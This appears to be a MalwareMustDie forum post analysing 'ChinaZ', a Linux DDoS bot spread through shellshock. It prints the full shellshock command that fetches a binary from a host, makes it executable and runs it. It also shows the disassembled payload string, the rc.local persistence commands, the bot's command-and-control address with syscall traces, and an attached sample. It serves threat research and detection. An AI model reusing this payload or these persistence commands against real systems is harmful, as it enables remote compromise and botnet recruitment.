The ELF's VT is: https://www.virustotal.com/en/file/92fd ... /analysis/
Out initial draft report: https://pastebin.com/raw.php?i=gf4xrB9n
This threat was detected just recently, via attacks via shellshock:
VT is: https://www.virustotal.com/en/file/ae67 ... /analysis/ < noted: LOW detection..
The calls, subs & function name is obfuscated, yet some new uniq typical characteristics can be spotted like below for the detection purpose:
registration for the autostart is using /etc/rc.local modification:
Due to the unique new infection pair shellshock (scanner-payload), new functions & new signature used, we consider this is a new China DDOSer variant: "ChinaZ"
#MalwareMustDie!
*) Threat found by B of MMD ELF Team
Out initial draft report: https://pastebin.com/raw.php?i=gf4xrB9n
This threat was detected just recently, via attacks via shellshock:
Code: Select all
The above request was reported to be generated from Windows version of the shellshock scanner binary with the below trace:/bin/bash -c \"rm -rf /tmp/*;echo wget http://xxxx:81/9521 -O /tmp/China.Z-gxak\x80 >>
/tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-gxak\x80 >>
/tmp/Run.sh;echo /tmp/China.Z-gxak\x80 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;
chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget
http://xxxx:81/9521 -O /tmp/China.Z-gxak\x80 >> /tmp/Run.sh;echo echo By China.Z >>
/tmp/Run.sh;echo chmod 777 /tmp/China.Z-gxak\x80 >> /tmp/Run.sh;echo /tmp/China.Z-gxak\x80 >>
/tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""
VT is: https://www.virustotal.com/en/file/ae67 ... /analysis/ < noted: LOW detection..
Code: Select all
The ELF payload was served in a hacked windows system served this ELF with the HFS server:.rdata:0057D808 aBinBashCRmRfTm db '() { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget %s -O /tmp/China'
.rdata:0057D808 ; DATA XREF: StartAddress+124o
.rdata:0057D808 db '.Z-%s >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chm'
.rdata:0057D808 db 'od 777 /tmp/China.Z-%s >> /tmp/Run.sh;echo /tmp/China.Z-%s >> /tm'
.rdata:0057D808 db 'p/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Ru'
.rdata:0057D808 db 'n.sh;/tmp/Run.sh"',0
The calls, subs & function name is obfuscated, yet some new uniq typical characteristics can be spotted like below for the detection purpose:
registration for the autostart is using /etc/rc.local modification:
Code: Select all
It hammered SE Linux, using hosts.conf - resolve.conf - and libnss as DNS resolver, and generated the backdoor is as per below, noted: not necessarily using hostname basis.
sed -i -e '/exit/d' /etc/rc.local
sed -i -e '2 i//ChinaZ' /etc/rc.local
Code: Select all
In this particular sample it calls CNC in aa.gm352.com (121.12.173.173:9521) at ASN 58543 | 121.12.168.0/21 | CHINATELECOM-HUNAN-H
SYSCALL5A, send(3, "cM\1\0\0\1\0\0\0\0\0\0\2aa\5gm352\3com\0\0\1\0\1", 30, MSG_NOSIGNAL)
SYSCALL5B, recvfrom(3, "cM\201\200\0\1\0\1\0\5\0\5\2aa\5gm352\3com\0\0\1\0\1\300\f"..., 1024, 0,
$PARAMS:{sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("202.238.95.24")}, [16])
SYSCALL5C, connect(3, {sa_family=AF_INET, sin_port=htons(9521), sin_addr=inet_addr("121.12.173.173")}, 16)
SYSCALL5D, write(3, "\0\0\0\0Linux2.6.2-4-686-\0\275w\267\0\1\0\0"..., 168) = 168
Code: Select all
$ my_lookup aa.gm352.com
aa.gm352.com. 300 IN A 121.12.173.173
gm352.com. 3600 IN NS ns4.he.net.
gm352.com. 3600 IN NS ns3.he.net.
gm352.com. 3600 IN NS ns2.he.net.
gm352.com. 3600 IN NS ns1.he.net.
gm352.com. 3600 IN NS ns5.he.net.
$ mycnccheck 121.12.173.173:9521
Connection to 121.12.173.173 9521 port [tcp/*] succeeded!
IPv4 TCP MMD.KickUR.ASS:36555->121.12.173.173:9521 (ESTABLISHED)
Due to the unique new infection pair shellshock (scanner-payload), new functions & new signature used, we consider this is a new China DDOSer variant: "ChinaZ"
#MalwareMustDie!
*) Threat found by B of MMD ELF Team
Attachments
7z/infected
(890.82 KiB) Downloaded 119 times
(890.82 KiB) Downloaded 119 times